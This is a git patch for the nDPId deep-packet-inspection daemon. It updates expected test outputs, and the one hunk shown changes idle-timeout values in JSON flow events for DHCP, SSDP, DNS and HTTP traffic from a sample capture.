From 22a8d04c748ff3e04ca11c5c29b4433c7136f5f5 Mon Sep 17 00:00:00 2001 From: lns Date: Sun, 24 Apr 2022 15:42:28 +0200 Subject: Added proper DLT_RAW dissection for IPv4 and IPv6. * nDPId: Improved TCP timeout handling if FIN/RST seen which caused Midstream TCP flows when there shouldn't be any. * nDPIsrvd: Unified remote descriptor resource cleanup on disconnects/shutdown. * nDPIsrvd: Added additional error messages for remote descriptors. * py-flow-info: Better daemon status message printing. Signed-off-by: lns --- test/results/1kxun.pcap.out | 366 +- test/results/443-chrome.pcap.out | 8 +- test/results/443-curl.pcap.out | 16 +- test/results/443-firefox.pcap.out | 16 +- test/results/443-git.pcap.out | 16 +- test/results/443-opvn.pcap.out | 12 +- test/results/443-safari.pcap.out | 16 +- test/results/BGP_Cisco_hdlc_slarp.pcap.out | 12 +- test/results/BGP_redist.pcap.out | 8 +- test/results/EAQ.pcap.out | 24 +- test/results/IEC104.pcap.out | 24 +- test/results/KakaoTalk_chat.pcap.out | 242 +- test/results/KakaoTalk_talk.pcap.out | 166 +- test/results/Oscar.pcap.out | 14 +- test/results/WebattackRCE.pcap.out | 6376 ++++---- test/results/WebattackSQLinj.pcap.out | 108 +- test/results/WebattackXSS.pcap.out | 7934 ++++----- test/results/afp.pcap.out | 12 +- test/results/aimini-http.pcap.out | 48 +- test/results/ajp.pcap.out | 24 +- test/results/alexa-app.pcapng.out | 1668 +- test/results/amqp.pcap.out | 36 +- test/results/android.pcap.out | 368 +- test/results/anyconnect-vpn.pcap.out | 278 +- test/results/anydesk-2.pcap.out | 28 +- test/results/anydesk.pcap.out | 28 +- test/results/bitcoin.pcap.out | 72 +- test/results/bittorrent.pcap.out | 262 +- test/results/bjnp.pcap.out | 82 +- test/results/bot.pcap.out | 12 +- test/results/cassandra.pcap.out | 24 +- test/results/check_mk_new.pcap.out | 12 +- test/results/chrome.pcap.out | 84 +- test/results/citrix.pcap.out | 12 +- test/results/coap_mqtt.pcap.out | 48 +- test/results/corba.pcap.out | 36 +- test/results/diameter.pcap.out | 12 +- test/results/discord.pcap.out | 16 +- test/results/dnp3.pcap.out | 96 +- test/results/dns_doh.pcap.out | 14 +- test/results/dns_dot.pcap.out | 14 +- test/results/dns_fragmented.pcap.out | 28 +- test/results/dnscrypt-v2-doh.pcap.out | 480 +- test/results/drda_db2.pcap.out | 12 +- test/results/encrypted_sni.pcap.out | 24 +- test/results/ethereum.pcap.out | 664 +- test/results/ethernetIP.pcap.out | 48 +- test/results/exe_download.pcap.out | 14 +- test/results/exe_download_as_png.pcap.out | 14 +- test/results/facebook.pcap.out | 30 +- test/results/firefox.pcap.out | 84 +- test/results/fix.pcap.out | 144 +- test/results/fix2.pcap.out | 24 +- test/results/forticlient.pcap.out | 80 +- test/results/ftp-start-tls.pcap.out | 12 +- test/results/ftp.pcap.out | 36 +- test/results/ftp_failed.pcap.out | 12 +- test/results/fuzz-2006-06-26-2594.pcap.out | 170 +- test/results/fuzz-2006-09-29-28586.pcap.out | 342 +- test/results/git.pcap.out | 12 +- test/results/gnutella.pcap.out | 1638 +- test/results/google_ssl.pcap.out | 12 +- test/results/googledns_android10.pcap.out | 100 +- test/results/h323-overflow.pcap.out | 8 +- test/results/h323.pcap.out | 10 +- test/results/hpvirtgrp.pcap.out | 108 +- .../http-crash-content-disposition.pcap.out | 46 +- test/results/http-lines-split.pcap.out | 12 +- test/results/http-manipulated.pcap.out | 24 +- test/results/http_auth.pcap.out | 12 +- test/results/http_connect.pcap.out | 26 +- test/results/http_ipv6.pcap.out | 166 +- test/results/iec60780-5-104.pcap.out | 72 +- test/results/imap-starttls.pcap.out | 12 +- test/results/imap.pcap.out | 12 +- test/results/imaps.pcap.out | 16 +- test/results/instagram.pcap.out | 392 +- test/results/ip_fragmented_garbage.pcap.out | 232 +- test/results/iphone.pcap.out | 222 +- test/results/ipp.pcap.out | 36 +- test/results/irc.pcap.out | 12 +- test/results/jabber.pcap.out | 12 +- test/results/kerberos-login.pcap.out | 14 +- test/results/kerberos.pcap.out | 378 +- test/results/kerberos_fuzz.pcapng.out | 8 +- test/results/lisp_registration.pcap.out | 24 +- test/results/log4j-webapp-exploit.pcap.out | 86 +- test/results/long_tls_certificate.pcap.out | 16 +- test/results/malware.pcap.out | 34 +- test/results/memcached.cap.out | 12 +- test/results/modbus.pcap.out | 12 +- test/results/monero.pcap.out | 24 +- test/results/mongodb.pcap.out | 60 +- test/results/mpeg.pcap.out | 14 +- test/results/mqtt.pcap.out | 20 +- test/results/mssql_tds.pcap.out | 110 +- test/results/mysql-8.pcap.out | 12 +- test/results/nats.pcap.out | 24 +- ...ndpi_match_string_subprotocol__error.pcapng.out | 12 +- test/results/nest_log_sink.pcap.out | 158 +- test/results/netbios.pcap.out | 10 +- test/results/netflix.pcap.out | 638 +- test/results/nintendo.pcap.out | 56 +- test/results/nntp.pcap.out | 12 +- test/results/no_sni.pcap.out | 110 +- test/results/ocs.pcap.out | 2019 +-- test/results/ocsp.pcapng.out | 120 +- test/results/ookla.pcap.out | 24 +- test/results/openvpn.pcap.out | 12 +- test/results/oracle12.pcapng.out | 12 +- test/results/pgsql.pcap.out | 24 +- test/results/pinterest.pcap.out | 476 +- test/results/pluralsight.pcap.out | 92 +- test/results/pop3.pcap.out | 12 +- test/results/pops.pcapng.out | 12 +- test/results/pps.pcap.out | 658 +- test/results/pptp.pcap.out | 12 +- test/results/punycode-idn.pcap.out | 12 +- .../quic-mvfst-22_decryption_error.pcap.out | 734 +- test/results/quickplay.pcap.out | 236 +- test/results/rdp.pcap.out | 12 +- test/results/reasm_crash_anon.pcapng.out | 12 +- test/results/reddit.pcap.out | 888 +- test/results/rsync.pcap.out | 12 +- test/results/rtmp.pcap.out | 12 +- test/results/rtsp.pcap.out | 84 +- test/results/rtsp_setup_http.pcapng.out | 8 +- test/results/s7comm.pcap.out | 12 +- test/results/safari.pcap.out | 102 +- test/results/salesforce.pcap.out | 16 +- test/results/sccp_hw_conf_register.pcapng.out | 12 +- test/results/selfsigned.pcap.out | 14 +- test/results/signal.pcap.out | 224 +- test/results/simple-dnscrypt.pcap.out | 64 +- test/results/sites.pcapng.out | 620 +- test/results/skype.pcap.out | 1168 +- test/results/skype_no_unknown.pcap.out | 912 +- test/results/smb_deletefile.pcap.out | 12 +- test/results/smbv1.pcap.out | 12 +- test/results/smpp_in_general.pcap.out | 12 +- test/results/smtp-starttls.pcap.out | 12 +- test/results/smtp.pcap.out | 12 +- test/results/smtps.pcapng.out | 12 +- test/results/snapchat.pcap.out | 42 +- test/results/socks-http-example.pcap.out | 36 +- test/results/ssh.pcap.out | 20 +- test/results/ssl-cert-name-mismatch.pcap.out | 16 +- test/results/starcraft_battle.pcap.out | 442 +- test/results/synscan.pcap.out | 15974 +++++++++---------- test/results/teams.pcap.out | 560 +- test/results/teamviewer.pcap.out | 12 +- test/results/telnet.pcap.out | 18 +- test/results/tinc.pcap.out | 24 +- test/results/tls-esni-fuzzed.pcap.out | 24 +- test/results/tls-rdn-extract.pcap.out | 16 +- test/results/tls_alert.pcap.out | 12 +- test/results/tls_certificate_too_long.pcap.out | 214 +- test/results/tls_cipher_lens.pcap.out | 40 +- test/results/tls_esni_sni_both.pcap.out | 28 +- test/results/tls_invalid_reads.pcap.out | 22 +- test/results/tls_long_cert.pcap.out | 16 +- test/results/tls_port_80.pcapng.out | 14 +- test/results/tls_torrent.pcapng.out | 16 +- test/results/tls_verylong_certificate.pcap.out | 16 +- test/results/tor.pcap.out | 106 +- test/results/trickbot.pcap.out | 14 +- test/results/tumblr.pcap.out | 538 +- test/results/viber.pcap.out | 140 +- test/results/vnc.pcap.out | 24 +- test/results/wa_video.pcap.out | 14 +- test/results/wa_voice.pcap.out | 76 +- test/results/waze.pcap.out | 442 +- test/results/webex.pcap.out | 736 +- test/results/websocket.pcap.out | 12 +- test/results/wechat.pcap.out | 810 +- test/results/weibo.pcap.out | 316 +- test/results/whatsapp_login_call.pcap.out | 330 +- test/results/whatsapp_login_chat.pcap.out | 38 +- test/results/whatsapp_voice_and_message.pcap.out | 60 +- test/results/whatsappfiles.pcap.out | 30 +- test/results/whois.pcapng.out | 38 +- test/results/wow.pcap.out | 60 +- test/results/youtubeupload.pcap.out | 16 +- test/results/z3950.pcapng.out | 24 +- test/results/zabbix.pcap.out | 12 +- test/results/zattoo.pcap.out | 26 +- test/results/zcash.pcap.out | 12 +- test/results/zoom.pcap.out | 198 +- test/results/zoom2.pcap.out | 16 +- 189 files changed, 26884 insertions(+), 29363 deletions(-) (limited to 'test') diff --git a/test/results/1kxun.pcap.out b/test/results/1kxun.pcap.out index 6484c4b19..777fcb4c5 100644 --- a/test/results/1kxun.pcap.out +++ b/test/results/1kxun.pcap.out @@ -13,8 +13,8 @@ 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104373741,"flow_last_seen":1470104373741,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1470104373741,"l3_proto":"ip4","src_ip":"192.168.119.1","dst_ip":"255.255.255.255","src_port":67,"dst_port":68,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00847{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1470104373741,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1470104373741,"pkt":"\/\/\/\/\/\/\/\/TF4M6gNlCABFAAFIAAAAABARcfzAqHcB\/\/\/\/\/wBDAEQBNKS5AgEGAMCRIFIAAIAAwKgFJMCoBSTAqHcBAAAAAAAmWsJjVQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEFNgTAqHcBMwQAAAA8AQT\/\/wAAAwTAqHcBBhCoXwEBCAgICKhfwAEICAQEKgioX8MMe8wtdP8AAAAA"} 00696{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104373741,"flow_last_seen":1470104373741,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1470104373741,"l3_proto":"ip4","src_ip":"192.168.119.1","dst_ip":"255.255.255.255","src_port":67,"dst_port":68,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"","fingerprint":"","class_ident":""}} -00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104375419,"flow_last_seen":1470104375419,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104375419,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53605,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1470104375419,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104375419,"pkt":"TF4M6gNlYMVHBbyMCABFAAA0ZDJAAEAGzmrAqAUQROn9hdFlAFAG4xw3xV6fSoAREAEocwAAAQEIChoPAavPGvHS"} +00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104375419,"flow_last_seen":1470104375419,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104375419,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53605,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1470104375419,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104375419,"pkt":"TF4M6gNlYMVHBbyMCABFAAA0ZDJAAEAGzmrAqAUQROn9hdFlAFAG4xw3xV6fSoAREAEocwAAAQEIChoPAavPGvHS"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104376017,"flow_last_seen":1470104376017,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1470104376017,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"239.255.255.250","src_port":64674,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00621{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1470104376017,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1470104376017,"pkt":"AQBef\/\/6uKxv2MGbCABFAAClQRIAAAQRv2HAqAUy7\/\/\/+vyiB2wAkVLKTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="} 00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104376017,"flow_last_seen":1470104376017,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1470104376017,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"239.255.255.250","src_port":64674,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} @@ -49,11 +49,11 @@ 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1470104377734,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":80,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":80,"pkt_l4_len":46,"thread_ts_msec":1470104377734,"pkt":"TF4M6gNlABxCjnAxCABFAABCUcIAAIARpSjAqHMICAgICMdQADUALoWI\/SwBAAABAAAAAAAAAmpwBmthbmthbgUxa3h1bgRtb2JpAAABAAE="} 00530{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1470104377753,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":112,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":112,"pkt_l4_len":78,"thread_ts_msec":1470104377753,"pkt":"ABxCjnAxTF4M6gNlCABFAABinjgAAC4RqpIICAgIwKhzCAA1x1AATmX5\/SyBgAABAAIAAAAAAmpwBmthbmthbgUxa3h1bgRtb2JpAAABAAHADAABAAEAAAErAARquSNuwAwAAQABAAABKwAEarkjcA=="} 00791{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":21,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104377734,"flow_last_seen":1470104377753,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1470104377753,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":51024,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Streaming"},"dns": {"query":"jp.kankan.1kxun.mobi","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"106.185.35.110"}} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":22,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104377754,"flow_last_seen":1470104377754,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104377754,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49597,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1470104377754,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104377754,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UcRAAIAG5yfAqHMIarkjbsG9AFA9WFFgAAAAAIACIAA9OgAAAgQE7AEDAwgBAQQC"} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1470104377754,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104377754,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UcRAAIAG5yfAqHMIarkjbsG9AFA9WFFgAAAAAIACIAA9OgAAAgQE7AEDAwgBAQQC"} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1470104377810,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104377810,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGguxquSNuwKhzCABQwb1z6xq8PVhRYYASchBbqgAAAgQFtAEBBAIBAwMH"} -00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104377754,"flow_last_seen":1470104377818,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":414,"flow_tot_l4_payload_len":414,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1470104377818,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49597,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"jp.kankan.1kxun.mobi","url":"jp.kankan.1kxun.mobi\/api\/videos\/10410.json?callback=jQuery18306855657112319022_1470103242123&_=1470104377698","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":22,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104377754,"flow_last_seen":1470104377754,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104377754,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49597,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1470104377754,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104377754,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UcRAAIAG5yfAqHMIarkjbsG9AFA9WFFgAAAAAIACIAA9OgAAAgQE7AEDAwgBAQQC"} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1470104377754,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104377754,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UcRAAIAG5yfAqHMIarkjbsG9AFA9WFFgAAAAAIACIAA9OgAAAgQE7AEDAwgBAQQC"} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1470104377810,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104377810,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGguxquSNuwKhzCABQwb1z6xq8PVhRYYASchBbqgAAAgQFtAEBBAIBAwMH"} +00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104377754,"flow_last_seen":1470104377818,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":414,"flow_tot_l4_payload_len":414,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1470104377818,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49597,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"jp.kankan.1kxun.mobi","url":"jp.kankan.1kxun.mobi\/api\/videos\/10410.json?callback=jQuery18306855657112319022_1470103242123&_=1470104377698","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1470104377820,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1470104377820,"pkt":"AQBeAAD8ABxCjnAxCABFAAAyUccAAAERU0fAqHMI4AAA\/MkCFOsAHtPcYF4AAAABAAAAAAAABHdwYWQAAAEAAQ=="} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1470104377839,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":98,"pkt_l4_len":44,"thread_ts_msec":1470104377839,"pkt":"MzMAAQACcD6s8PAHht1gBWEEACwRAf6AAAAAAAAABAZVqGRTJd3\/AgAAAAAAAAAAAAAAAQACAiICIwAsiQQLJ3MdAAEADgABAAEduOb7cD6s8PAHAAYABAAXABgACAACAGQ="} 00850{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1470104377839,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1470104377839,"pkt":"\/\/\/\/\/\/\/\/TF4M6gNlCABFAAFIAAAAABARcfzAqHcB\/\/\/\/\/wBDAEQBNAJhAgEGADFjB6UAAAAAwKgFCcCoBQnAqHcBAAAAAHDxofgq\/QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEFNgTAqHcBMwQAAAA8AQT\/\/wAAAwTAqHcBBhCoXwEBCAgICKhfwAEICAQE\/wAAAAAAAAAAAAAAAAAA"} @@ -61,9 +61,9 @@ 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1470104377901,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1470104377901,"pkt":"TF4M6gNlABxCjnAxCABFAAA+UcgAAIARpSbAqHMICAgICM3zADUAKlE0ceUBAAABAAAAAAAABmthbmthbgUxa3h1bgNjb20AAAEAAQ=="} 00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104377901,"flow_last_seen":1470104377901,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1470104377901,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":52723,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Streaming"},"dns": {"query":"kankan.1kxun.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 